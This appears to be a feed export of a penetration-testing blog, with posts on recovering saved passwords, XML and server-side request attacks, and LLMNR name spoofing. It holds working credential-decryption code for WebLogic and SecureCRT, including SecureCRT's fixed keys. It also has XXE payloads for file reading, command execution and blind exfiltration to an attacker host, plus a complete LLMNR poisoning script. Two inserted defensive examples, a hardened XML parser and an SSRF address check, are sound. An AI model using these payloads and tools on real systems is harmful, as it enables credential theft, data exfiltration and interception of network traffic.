<content type="html"><![CDATA[<h1 id="常用软件密码解密"><a href="#常用软件密码解密" class="headerlink" title="常用软件密码解密"></a>Password recovery for common software</h1><h2 id="Weblogic"><a href="#Weblogic" class="headerlink" title="Weblogic"></a>Weblogic</h2><ol>
<li>Console login password</li>
<li>Database configuration file (Oracle\Middleware\user_projects\domains\base_domain\config\jdbc\tstJDBCDataScouce-5006-jdbc.xml)</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div></pre></td><td class="code"><pre><div class="line">import weblogic.security.internal.*;</div><div class="line">import weblogic.security.internal.encryption.*;</div><div class="line"></div><div class="line">/**</div><div class="line"> * Decrypts a WebLogic-encrypted value ({AES}...) with the domain's own key material.</div><div class="line"> * Encrypted password file: Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties</div><div class="line"> * Key file:                Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystemIni.dat</div><div class="line"> */</div><div class="line">public class WebLogicDecryptor {</div><div class="line">    private static ClearOrEncryptedService ces;</div><div class="line">    public static void main(String[] args) throws Exception {</div><div class="line">        if (args.length < 2) { // both arguments are required</div><div class="line">            throw new Exception("usage: WebLogicDecryptor [domainDir] [encryptStr]");</div><div class="line">        }</div><div class="line">        ces = new ClearOrEncryptedService(</div><div class="line">                SerializedSystemIni.getEncryptionService(args[0])); // domain directory containing security\SerializedSystemIni.dat</div><div class="line">        System.out.println("Decrypted: " + ces.decrypt(args[1])); // e.g. {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8= -> 12id9*@YNs0_q2dxwe</div><div class="line">    }</div><div class="line">}</div></pre></td></tr></table></figure>
<a id="more"></a>
<ol>
<li>Set the environment variables<br><code>base_domain\bin\setDomainEnv.cmd</code></li>
<li>Compile<br><code>javac WebLogicDecryptor.java</code></li>
<li>Run<br><code>java WebLogicDecryptor D:\Server\Oracle\Middleware\user_projects\domains\base_domain {AES}9E3OyXexBQpZ1q0nyrYG4RXR44LVBEscuNXLH0Ya1Q8=</code></li>
</ol>
<p><a href="https://github.com/NetSPI/WebLogicPasswordDecryptor" target="_blank" rel="external">https://github.com/NetSPI/WebLogicPasswordDecryptor</a><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">javac -classpath bcprov-jdk15on-1.58.jar WebLogicPasswordDecryptor.java</div><div class="line">java -Djava.ext.dirs=. WebLogicPasswordDecryptor "./SerializedSystemIni.dat" "{AES}8/rTjIuC4mwlrlZgJK++LKmAThcoJMHyigbcJGIztug="</div></pre></td></tr></table></figure></p>
<p>Patch installation with BSU (list applied patches, list downloaded patches, install a patch)<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">./bsu.cmd -prod_dir=c:\Oracle\Middleware\wlserver_10.3 -status=applied -verbose -view</div><div class="line">./bsu.sh -view -status=downloaded -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir</div><div class="line">./bsu.sh -install -patch_download_dir=/home/weblogic/Oracle/Middleware/utils/bsu/cache_dir -prod_dir=/home/weblogic/Oracle/Middleware/wlserver_10.3 -patchlist=GFWX -verbose</div></pre></td></tr></table></figure></p>
<h2 id="Firefox"><a href="#Firefox" class="headerlink" title="Firefox"></a>Firefox</h2><p>Path of nss3.dll (the NSS library that does the decryption)<br>C:\Program Files (x86)\Mozilla Firefox\nss3.dll</p>
<p>Firefox profile directory (key3.db holds the key database, logins.json the encrypted saved logins)<br>C:\Users\administrator\AppData\Roaming\Mozilla\Firefox\Profiles\zvu7t3k2.default<br>cert8.db<br>key3.db<br>logins.json</p>
<p><code>ff_decrypt.py profilesfolder</code></p>
<h2 id="SecureCRT"><a href="#SecureCRT" class="headerlink" title="SecureCRT"></a>SecureCRT</h2><p><a href="https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py" target="_blank" rel="external">https://github.com/gitPoc32/Forensic/blob/master/VanDykeSecureCRT/SecureCRT-decryptpass.py</a></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div></pre></td><td class="code"><pre><div class="line">from Crypto.Cipher import Blowfish  # pycryptodome; Python 3 port of the Python 2 script linked above</div><div class="line"></div><div class="line">def decrypt(password):  # password: the hex string stored in the session .ini</div><div class="line">    c1 = Blowfish.new(bytes.fromhex('5F B0 45 A2 94 17 D9 16 C6 C6 A2 FF 06 41 82 B7'), Blowfish.MODE_CBC, b'\x00' * 8)  # fixed key 1, zero IV</div><div class="line">    c2 = Blowfish.new(bytes.fromhex('24 A6 3D DE 5B D3 B3 82 9C 7E 06 F4 08 16 AA 07'), Blowfish.MODE_CBC, b'\x00' * 8)  # fixed key 2, zero IV</div><div class="line">    padded = c1.decrypt(c2.decrypt(bytes.fromhex(password))[4:-4])  # outer layer, drop 4 bytes at each end, inner layer</div><div class="line">    p = b''</div><div class="line">    while len(padded) >= 2 and padded[:2] != b'\x00\x00':  # UTF-16LE text up to the first double NUL</div><div class="line">        p += padded[:2]</div><div class="line">        padded = padded[2:]</div><div class="line">    return p.decode('utf-16-le')</div><div class="line"></div><div class="line">print(decrypt("xxx240f919a7a477198d1f6ce3a1fbf5a3671c82483f34bed1304c7ebe8de345"))</div></pre></td></tr></table></figure>
<h2 id="Foxmail"><a href="#Foxmail" class="headerlink" title="Foxmail"></a>Foxmail</h2><p>Versions below 7.0: Foxmail\Storage\test@domain.com\Accounts\Account.stg<br>Version 7.0 and above: Account.cfg</p>
<ol>
<li>Account.stg files can be decrypted with existing tools.</li>
<li>For the Account.cfg format, copy the Account directory into the Storage directory of a Foxmail installation of the same version, add the new mailbox (Storage\test@domain.com\) to the FMStorage.list file, start the client and read the password with an asterisk-password revealer.</li>
</ol>
<h2 id="Outlook"><a href="#Outlook" class="headerlink" title="Outlook"></a>Outlook</h2>]]></content>
</entry>
<entry>
<title><![CDATA[XXE]]></title>
<url>/2018/05/11/XXE/</url>
<content type="html"><![CDATA[<h1 id="XML-Injection"><a href="#XML-Injection" class="headerlink" title="XML Injection"></a>XML Injection</h1><h2 id="XML-External-Entity-XXE-Processing"><a href="#XML-External-Entity-XXE-Processing" class="headerlink" title="XML External Entity (XXE) Processing"></a>XML External Entity (XXE) Processing</h2><p>Reading local resources: an external entity declared in the DTD is expanded with the contents of the file it points to.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><?php</span></div><div class="line">$xml=<span class="string"><<<XML</span></div><div class="line"><span class="string"><?xml version="1.0" encoding="ISO-8859-1"?></span></div><div class="line"><span class="string"><!DOCTYPE foo [ </span></div><div class="line"><span class="string"> <!ELEMENT foo ANY ></span></div><div class="line"><span class="string"> <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo></span></div><div class="line"><span class="string">XML;</span></div><div class="line">$data = simplexml_load_string($xml);</div><div class="line">print_r($data);</div><div class="line"><span class="meta">?></span></div></pre></td></tr></table></figure>
<p>Remote code execution; requires the PHP expect extension (the <code>expect://</code> wrapper) to be enabled.</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><span class="php"><span class="meta"><?</span>xml version=<span class="string">"1.0"</span> encoding=<span class="string">"ISO-8859-1"</span><span class="meta">?></span></span></div><div class="line"><span class="meta"><!DOCTYPE foo [ </span></div><div class="line"><span class="meta"> <!ELEMENT foo ANY ></span></div><div class="line"><span class="meta"> <!ENTITY xxe SYSTEM "expect://id" >]></span></div><div class="line"><span class="tag"><<span class="name">creds</span>></span></div><div class="line"> <span class="tag"><<span class="name">user</span>></span>&xxe;<span class="tag"></<span class="name">user</span>></span></div><div class="line"> <span class="tag"><<span class="name">pass</span>></span>mypass<span class="tag"></<span class="name">pass</span>></span></div><div class="line"><span class="tag"></<span class="name">creds</span>></span></div></pre></td></tr></table></figure>
<a id="more"></a>
<p>Probing the internal network: the response, error or response time reveals whether the host and port are reachable from the server.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><?xml version="1.0" ?></div><div class="line"><!DOCTYPE ANY [</div><div class="line"> <!ENTITY xxe SYSTEM "http://192.168.1.2:8080/data" >]><foo>&xxe;</foo></div></pre></td></tr></table></figure>
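<p>An added example, not part of the original post, showing what the <code>SYSTEM</code> entity payloads above do inside a parser and how the same parser behaves once hardened. It uses only Python's standard-library <code>xml.sax</code>. The <code>/etc/passwd</code> contents are a constructed stand-in served by a recording entity resolver so that the script runs offline; the names <code>parse_untrusted</code>, <code>has_doctype</code> and <code>RecordingResolver</code> are this example's own.</p>

```python
import io
import xml.sax
from xml.sax import handler, xmlreader

# Constructed stand-in for what the parser would read from the SYSTEM identifier;
# a real parser opens the file or URL itself.
FAKE_PASSWD = b"root:x:0:0:root:/root:/bin/bash\n"

# The first payload from the post: an external general entity pointing at a local file.
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""


class TextCollector(handler.ContentHandler):
    """Concatenates character data so we can see what the entity expanded to."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    @property
    def text(self):
        return "".join(self.parts)


class RecordingResolver(handler.EntityResolver):
    """Records every external entity the parser asks for and serves canned bytes
    instead, so the demo never touches the real file system or network."""

    def __init__(self):
        self.requested = []

    def resolveEntity(self, publicId, systemId):
        self.requested.append(systemId)
        src = xmlreader.InputSource()
        src.setByteStream(io.BytesIO(FAKE_PASSWD))
        return src


def parse_untrusted(data, allow_external_entities):
    """Parse attacker-controlled XML. Returns (text content, list of URIs the parser
    tried to fetch). allow_external_entities=True is the vulnerable configuration."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, allow_external_entities)
    collector, resolver = TextCollector(), RecordingResolver()
    parser.setContentHandler(collector)
    parser.setEntityResolver(resolver)
    parser.parse(io.BytesIO(data))
    return collector.text, resolver.requested


def has_doctype(data):
    """Cheapest hardening of all: refuse any document that carries a DTD, since every
    entity trick (external, parameter, billion laughs) needs one."""
    return b"<!DOCTYPE" in data or b"<!ENTITY" in data


if __name__ == "__main__":
    text, fetched = parse_untrusted(XXE_PAYLOAD, allow_external_entities=True)
    print("vulnerable parser fetched", fetched, "and leaked:", text.strip())
    text, fetched = parse_untrusted(XXE_PAYLOAD, allow_external_entities=False)
    print("hardened parser fetched", fetched, "and returned:", repr(text))
    print("rejected before parsing:", has_doctype(XXE_PAYLOAD))
```

With external general entities enabled, the resolver is asked for <code>file:///etc/passwd</code> and the "file" contents land inside <code>&lt;foo&gt;</code>, exactly the behaviour the PHP example relies on; with the feature off the entity expands to nothing. Modern Python disables it by default, but libxml2-based parsers such as PHP's need <code>libxml_disable_entity_loader</code> or the equivalent option set explicitly, which is why the DTD check before parsing is worth keeping in any case.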
<p>Tag Injection<br>Content injection: user input placed inside an XML document without escaping can add or close elements.</p>
<h4 id="Blind-XXE"><a href="#Blind-XXE" class="headerlink" title="Blind XXE"></a>Blind XXE</h4><p>Nested remote parameter entities: when the application does not echo the parsed document, the file contents are carried out of band in a request to an attacker-controlled host.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><?xml version="1.0"?> </div><div class="line"><!DOCTYPE ANY[ </div><div class="line"><!ENTITY % file SYSTEM "file:///C:/1.txt"> </div><div class="line"><!ENTITY % remote SYSTEM "http://192.168.150.1/evil.txt"> </div><div class="line">%remote; </div><div class="line">%all; </div><div class="line">%send; </div><div class="line">]></div></pre></td></tr></table></figure>
<p>evil.txt<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><!ENTITY % all "<!ENTITY % send SYSTEM 'http://192.168.150.1/1.php?file=%file;'>"></div></pre></td></tr></table></figure></p>
<h3 id="Testing-for-XML-Injection"><a href="#Testing-for-XML-Injection" class="headerlink" title="Testing for XML Injection"></a>Testing for XML Injection</h3><p>Break the XML syntax so that the parser throws an error.</p>
<p>If the '&' character is not itself escaped (as &amp;amp;), it can be used to test for XML injection.</p>
<p><a href="https://github.com/xmendez/wfuzz/" target="_blank" rel="external">https://github.com/xmendez/wfuzz/</a></p>
<h3 id="实例"><a href="#实例" class="headerlink" title="实例"></a>Example</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">POST /hrss/dorado/smartweb2.RPC.d?__rpc=true</div><div class="line"></div><div class="line">__type=updateData&__viewInstanceId=dorado.tabselfservice.FindBackStaticPWSvNewForReset~dorado.common.BaseViewModel&__xml=<!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:////test" >]><foo>&xxe;</foo>&1518403736067</div></pre></td></tr></table></figure>
<p>Payload with echoed output (the entity reference is URL-encoded as <code>%26xxe;</code> because it travels in a form parameter)<br><figure class="highlight xml"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"><span class="meta"><!DOCTYPE ANY[</span></div><div class="line"><span class="meta"><!ENTITY xxe SYSTEM "/">]></span></div><div class="line"><span class="tag"><<span class="name">rpc</span> <span class="attr">method</span>=<span class="string">"noteInputCount"</span>></span></div><div class="line"> <span class="tag"><<span class="name">ps</span>></span></div><div class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">name</span>=<span class="string">"user_code"</span>></span>1<span class="tag"></<span class="name">p</span>></span></div><div class="line"> <span class="tag"></<span class="name">ps</span>></span></div><div class="line"> <span class="tag"><<span class="name">vps</span>></span></div><div class="line"> <span class="tag"><<span class="name">p</span> <span class="attr">name</span>=<span class="string">"DEFAULT_DATA_SOURCE"</span>></span>%26xxe;<span class="tag"></<span class="name">p</span>></span></div><div class="line"> <span class="tag"></<span class="name">vps</span>></span></div><div class="line"><span class="tag"></<span class="name">rpc</span>></span></div></pre></td></tr></table></figure></p>
<h2 id="SSRF-Server-Side-Request-Forgery"><a href="#SSRF-Server-Side-Request-Forgery" class="headerlink" title="SSRF (Server-Side Request Forgery)"></a>SSRF (Server-Side Request Forgery)</h2><p>Internal port probing: the two PHP fragments below are typical sinks, where the host, port or URL comes from the request.</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><?php</div><div class="line">// Port probe: $host and $port are attacker-controlled request parameters</div><div class="line">if(!$fp = fsockopen($host, intval($port), $errno, $errstr, 5)){</div><div class="line">    echo "$errno $errstr\n";</div><div class="line">}</div><div class="line">else{</div><div class="line">    echo "Port open.\n";</div><div class="line">    if($fp){</div><div class="line">        fclose($fp);</div><div class="line">    }</div><div class="line">}</div><div class="line">?></div></pre></td></tr></table></figure>
<figure class="highlight php"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line"><?php</div><div class="line">// Fetch a page: with an attacker-controlled URL this reaches internal hosts</div><div class="line">$ch = curl_init();</div><div class="line">curl_setopt($ch, CURLOPT_URL, "http://www.example.com/");</div><div class="line">curl_setopt($ch, CURLOPT_HEADER, 0);</div><div class="line">echo curl_exec($ch);</div><div class="line">curl_close($ch);</div><div class="line">?></div></pre></td></tr></table></figure>
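<p>The sinks above connect to whatever host they are handed. As an added example (not from the original post), here is the check a server-side fetcher should run before connecting: resolve the host and refuse anything that lands in loopback, RFC 1918, CGNAT, link-local (including the cloud metadata address 169.254.169.254), multicast or IPv4-mapped IPv6 ranges, while also catching the abbreviated and integer IPv4 spellings libc accepts. Python, standard library only; <code>check_ssrf_target</code>, the injectable <code>resolver</code> parameter and the <code>STUB_TABLE</code> lookup data are this example's own constructions.</p>

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Ranges a server-side fetcher must never reach: loopback, RFC 1918, CGNAT, link-local
# (169.254.169.254 is the cloud metadata endpoint), multicast, reserved, the IPv6
# equivalents and IPv4-mapped IPv6 (the ::ffff:10.0.0.1 style of bypass).
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::1/128", "fc00::/7", "fe80::/10", "::ffff:0:0/96",
)]
ALLOWED_SCHEMES = {"http", "https"}

# Constructed lookup table so the demo and its checks run offline.
STUB_TABLE = {
    "example.com": {"93.184.216.34"},
    "intranet.corp": {"10.0.0.5"},
    "dual.corp": {"93.184.216.34", "fd00::1"},   # one public and one ULA address
}


def stub_resolver(host):
    """Offline stand-in for default_resolver, backed by STUB_TABLE."""
    if host not in STUB_TABLE:
        raise socket.gaierror(f"stub: unknown host {host}")
    return STUB_TABLE[host]


def default_resolver(host):
    """All A/AAAA addresses for a name; raises socket.gaierror if it does not resolve."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def normalize_ipv4(host):
    """IPv4 literal in any form libc accepts (127.1, 0x7f000001, 2130706433), else None."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def check_ssrf_target(url, resolver=default_resolver):
    """Return (allowed, reason). Every address the host maps to must be public."""
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"malformed URL: {exc}"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"   # file://, gopher://, dict:// ...
    if parts.username or parts.password:
        return False, "credentials in URL"                    # http://trusted.com@10.0.0.1/
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        addresses = [ipaddress.ip_address(host)]              # plain IPv4/IPv6 literal
    except ValueError:
        v4 = normalize_ipv4(host)
        if v4 is not None:
            addresses = [v4]                                  # disguised IPv4 literal
        else:
            try:
                addresses = [ipaddress.ip_address(a) for a in resolver(host)]
            except (socket.gaierror, ValueError) as exc:
                return False, f"unresolvable host: {exc}"
    if not addresses:
        return False, "host resolved to no address"
    for addr in addresses:
        for net in BLOCKED_NETWORKS:
            if addr in net:
                return False, f"{addr} is inside blocked range {net}"
    return True, "ok"


if __name__ == "__main__":
    for target in ("http://example.com/", "http://intranet.corp/", "http://2130706433/",
                   "http://169.254.169.254/latest/meta-data/", "http://[::ffff:10.0.0.1]/"):
        print(target, check_ssrf_target(target, stub_resolver))
```

One caveat the check cannot remove on its own: the fetch resolves the name a second time, so a DNS record that rebinds between the check and the connection still reaches an internal address. Connect to the address you validated instead of re-resolving, and run the same check on every redirect the fetcher follows.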
<h2 id="XPath-injection"><a href="#XPath-injection" class="headerlink" title="XPath injection"></a>XPath injection</h2><p>XPath uses path expressions to select nodes or node-sets from an XML document; unescaped user input inside such an expression changes which nodes are selected, much like SQL injection.</p>
]]></content>
</entry>
<entry>
<title><![CDATA[Name-spoofing man-in-the-middle attacks]]></title>
<url>/2017/12/14/%E5%90%8D%E7%A7%B0%E6%AC%BA%E9%AA%97%E4%B8%AD%E9%97%B4%E4%BA%BA%E6%94%BB%E5%87%BB/</url>
<content type="html"><![CDATA[<h1 id="名称欺骗中间人攻击"><a href="#名称欺骗中间人攻击" class="headerlink" title="名称欺骗中间人攻击"></a>Name-spoofing man-in-the-middle attacks</h1><h3 id="LLMNR"><a href="#LLMNR" class="headerlink" title="LLMNR"></a>LLMNR</h3><p>Link-Local Multicast Name Resolution (LLMNR) resolves host names on the local link by multicast, without a DNS server; Windows falls back to it when a DNS lookup fails.</p>
<p>When we run <code>ping WEBTST01</code> and DNS cannot resolve the name, the host sends an LLMNR query for WEBTST01. All LLMNR queries go to the multicast address 224.0.0.252 (MAC <code>01:00:5E:00:00:FC</code>) on UDP port 5355, and the host that owns the name answers with a unicast response. Nothing authenticates that answer, which is what the poisoning below exploits.</p>
<p><img src="https://i.imgur.com/o1jbyP5.png" alt=""></p>
<h4 id="LLMNR-packet-header-structure"><a href="#LLMNR-packet-header-structure" class="headerlink" title="LLMNR packet header structure"></a>LLMNR packet header structure</h4><p><img src="https://i.imgur.com/VHUoWeu.png" alt=""></p>
<ul>
<li>ID - A 16-bit identifier assigned by the program that generates any kind of query.</li>
<li>QR - Query/Response.</li>
<li>OPCODE - A 4-bit field that specifies the kind of query in this message. This value is set by the originator of a query and copied into the response. This specification defines the behavior of standard queries and responses (opcode value of zero). Future specifications may define the use of other opcodes with LLMNR.</li>
<li>C - Conflict.</li>
<li>TC - Truncation.</li>
<li>T - Tentative.</li>
<li>Z - Reserved for future use.</li>
<li>RCODE - Response code.</li>
<li>QDCOUNT - An unsigned 16-bit integer specifying the number of entries in the question section.</li>
<li>ANCOUNT - An unsigned 16-bit integer specifying the number of resource records in the answer section.</li>
<li>NSCOUNT - An unsigned 16-bit integer specifying the number of name server resource records in the authority records section.</li>
<li>ARCOUNT - An unsigned 16-bit integer specifying the number of resource records in the additional records section.</li>
</ul>
<a id="more"></a>
<h4 id="LLMNR-Poison"><a href="#LLMNR-Poison" class="headerlink" title="LLMNR Poison"></a>LLMNR Poison</h4><p>IP spoofing through name resolution: since any host on the link may answer, an attacker replies to every query claiming the requested name for its own address, and the victim connects there (for SMB or HTTP typically sending NTLM credentials in the process).</p>
<p>Python 2 demo that answers LLMNR queries with a chosen address<br><figure class="highlight python"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div><div class="line">24</div><div class="line">25</div><div class="line">26</div><div class="line">27</div><div class="line">28</div><div class="line">29</div><div class="line">30</div><div class="line">31</div><div class="line">32</div><div class="line">33</div><div class="line">34</div><div class="line">35</div><div class="line">36</div><div class="line">37</div><div class="line">38</div><div class="line">39</div><div class="line">40</div><div class="line">41</div><div class="line">42</div><div class="line">43</div><div class="line">44</div><div class="line">45</div><div class="line">46</div><div class="line">47</div><div class="line">48</div><div class="line">49</div><div class="line">50</div><div class="line">51</div><div class="line">52</div><div class="line">53</div><div class="line">54</div><div class="line">55</div><div class="line">56</div><div class="line">57</div><div class="line">58</div><div class="line">59</div><div class="line">60</div><div class="line">61</div><div class="line">62</div><div class="line">63</div><div class="line">64</div><div class="line">65</div><div class="line">66</div><div class="line">67</div><div class="line">68</div><div class="line">69</div><div class="line">70</div><div class="line">71</div><div class="line">72</div><div class="line">73</div><div 
class="line">74</div></pre></td><td class="code"><pre><div class="line"><span class="comment">#!python</span></div><div class="line"><span class="comment">#/usr/bin/env python</span></div><div class="line"></div><div class="line">__doc__ = <span class="string">"""</span></div><div class="line"><span class="string"> LLMNR Answer, by Her0in</span></div><div class="line"><span class="string">"""</span></div><div class="line"></div><div class="line"><span class="keyword">import</span> socket, struct</div><div class="line"></div><div class="line"><span class="class"><span class="keyword">class</span> <span class="title">LLMNR_Answer</span>:</span></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self, addr)</span>:</span></div><div class="line"></div><div class="line"> self.IPADDR = addr</div><div class="line"> self.las = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)</div><div class="line"> self.init_socket()</div><div class="line"> self.populate()</div><div class="line"></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">populate</span><span class="params">(self)</span>:</span></div><div class="line"></div><div class="line"> self.AnswerData = (</div><div class="line"> <span class="string">"TID"</span> <span class="comment"># Tid</span></div><div class="line"> <span class="string">"\x80\x00"</span> <span class="comment"># Flags Query(0x0000)? 
or Response(0x8000) ?</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Question</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Answer RRS</span></div><div class="line"> <span class="string">"\x00\x00"</span> <span class="comment"># Authority RRS</span></div><div class="line"> <span class="string">"\x00\x00"</span> <span class="comment"># Additional RRS</span></div><div class="line"> <span class="string">"LENGTH"</span> <span class="comment"># Question Name Length</span></div><div class="line"> <span class="string">"NAME"</span> <span class="comment"># Question Name</span></div><div class="line"> <span class="string">"\x00"</span> <span class="comment"># Question Name Null</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Query Type ,IPv4(0x0001)? or IPv6(0x001c)?</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Class</span></div><div class="line"> <span class="string">"LENGTH"</span> <span class="comment"># Answer Name Length</span></div><div class="line"> <span class="string">"NAME"</span> <span class="comment"># Answer Name</span></div><div class="line"> <span class="string">"\x00"</span> <span class="comment"># Answer Name Null</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Answer Type ,IPv4(0x0001)? 
or IPv6(0x001c)?</span></div><div class="line"> <span class="string">"\x00\x01"</span> <span class="comment"># Class</span></div><div class="line"> <span class="string">"\x00\x00\x00\x1e"</span> <span class="comment"># TTL Default:30s</span></div><div class="line"> <span class="string">"\x00\x04"</span> <span class="comment"># IP Length</span></div><div class="line"> <span class="string">"IPADDR"</span>) <span class="comment"># IP Address</span></div><div class="line"></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">init_socket</span><span class="params">(self)</span>:</span></div><div class="line"> self.HOST = <span class="string">"192.168.15.165"</span></div><div class="line"> self.PORT = <span class="number">5355</span></div><div class="line"> self.MulADDR = <span class="string">"224.0.0.252"</span></div><div class="line"> self.las.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, <span class="number">1</span>)</div><div class="line"> self.las.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, <span class="number">255</span>)</div><div class="line"> self.las.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP,</div><div class="line"> socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))</div><div class="line"></div><div class="line"> <span class="function"><span class="keyword">def</span> <span class="title">Answser</span><span class="params">(self)</span>:</span></div><div class="line"> self.las.bind((self.HOST, self.PORT))</div><div class="line"> <span class="keyword">print</span> <span class="string">"Listening..."</span></div><div class="line"> <span class="keyword">while</span> <span class="keyword">True</span>:</div><div class="line"> data, addr = self.las.recvfrom(<span class="number">1024</span>)</div><div class="line"></div><div class="line"> tid = data[<span class="number">0</span>:<span class="number">2</span>]</div><div class="line"> namelen = struct.unpack(<span 
class="string">'>B'</span>, data[<span class="number">12</span>])[<span class="number">0</span>]</div><div class="line"> name = data[<span class="number">13</span>:<span class="number">13</span> + namelen]</div><div class="line"></div><div class="line"> data = self.AnswerData.replace(<span class="string">'TID'</span>, tid)</div><div class="line"> data = data.replace(<span class="string">'LENGTH'</span>, struct.pack(<span class="string">'>B'</span>, namelen))</div><div class="line"> data = data.replace(<span class="string">'NAME'</span>, name)</div><div class="line"> data = data.replace(<span class="string">'IPADDR'</span>, socket.inet_aton(self.IPADDR))</div><div class="line"></div><div class="line"> <span class="keyword">print</span> <span class="string">"Poisoned answer(%s) sent to %s for name %s "</span> % (self.IPADDR, addr[<span class="number">0</span>], name)</div><div class="line"> self.las.sendto(data, addr)</div><div class="line"></div><div class="line"> self.las.setsockopt(socket.IPPROTO_IP, socket.IP_DROP_MEMBERSHIP,</div><div class="line"> socket.inet_aton(self.MulADDR) + socket.inet_aton(self.HOST))</div><div class="line"> self.las.close()</div><div class="line"></div><div class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</div><div class="line"> llmnr = LLMNR_Answer(<span class="string">"11.22.33.44"</span>)</div><div class="line"> llmnr.Answser()</div></pre></td></tr></table></figure></p>
